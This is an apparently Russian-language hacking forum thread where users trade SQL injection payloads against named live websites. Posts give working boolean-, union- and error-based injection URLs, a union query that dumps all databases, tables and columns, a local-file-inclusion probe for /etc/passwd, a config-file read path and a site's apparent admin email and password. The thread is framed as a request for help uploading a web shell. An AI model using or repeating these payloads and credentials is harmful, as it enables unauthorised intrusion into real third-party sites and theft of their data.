group_concat(users.email) error-based. однако, там тоже запрос режется, нужно узнать версию и выбрать самый короткий вектор https://rdot.org/forum/showthread.php?t=325 например: Code: XPATH syntax error: '.73-log5.1.73-log'
Так какой же вектор применим к этому случаю? Code: xttp://www.wyrgorod.ru/shop/subcategory_10(*)_0.html Error-based, который использовал BigBear ничего не дал, может быть это просто ошибка?
http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=noscript' не получается найти нужное направление, error based не помогает, что то можно придумать? HTML: http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=n')+AND+(order+by+1 не выдает ошибки
Конечно это так. Я вообще хрен знает, что делаю на этом форуме. Сижу, фигнёй страдаю. Boolean Based http://www.wyrgorod.ru/shop/subcategory_10'and(substr(@@version,1,1))=5+--+_0.html TRUE http://www.wyrgorod.ru/shop/subcategory_10'and(substr(@@version,1,1))=4+--+_0.html FALSE Union Based http://www.wyrgorod.ru/shop/subcategory_10'and(1)=2+union+select+@@version+--+_0.html Хватит вариантов?
Всем привет! Не могу залить шелл на сайт, через форму заливки я загружаю шелл.. пишет "Файл успешно загружен" но шелла на сайте так и нет. Code: http://hts.kharkov.ua/admin/update_graph.php Email: [email protected] Password: 55755575 Помимо этой админки есть ещё и другая Code: http://hts.kharkov.ua/admin.php г-н winstrool сказал, что пароль может быть спрятан "в локальной читалке" но я уже все архивы по перекачивал, старицы по пересматривал и сканером ArxScanSite 3.0 прошёлся, но увы. Помогите с заливкой шелла!
Select schema_name from information_schema.schemata для MsSQL выводит список всех dbs. Как дальше через infromation_schema вывести таблицы и колонки другой базы данных? Select table_name from information_schema.tables where... а как связать со schema_name?
select table_name from information_schema.tables where table_schema='information_schema' , где 'information_schema' - нужная бд. если фильтрует кавычки, то select table_name from information_schema.tables where table_schema=0x696E666F726D6174696F6E5F736368656D61
подскажите,есть ли тут инклюд? сколько не набираю ../ всё равно одно и тоже http://www.xn--brliner-kseblatt-vnbi.de/?site=regional&land=DE&bl=/etc/passwd
да-да, я так и делала,в идно нет прав на чтение других бд Object reference not set to an instance of an object
Вот тебе БД.. выбирай любую. Но залить шелл не получится Code: http://www.hts.kharkov.ua/news_full.php?id=1%27+union+select+%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,2,3+--+
нет. ошибка внутри. кстати, там есть несколько sqli также, читалка файлов через fread(): Code: http://www.bärliner-käseblatt.de/?site=startseite&lang=lol конфиг /www/htdocs/w00b2ffe/anzeiger/config/config.php
кто дотянет?) http://www.worldwaterforum6.org/en/library/?no_cache=1&x_amswwfbd_pi1_list[evenements][564][uid]=564&tx_amswwfbd_pi1_list[evenements]=1 еррор басе в 1
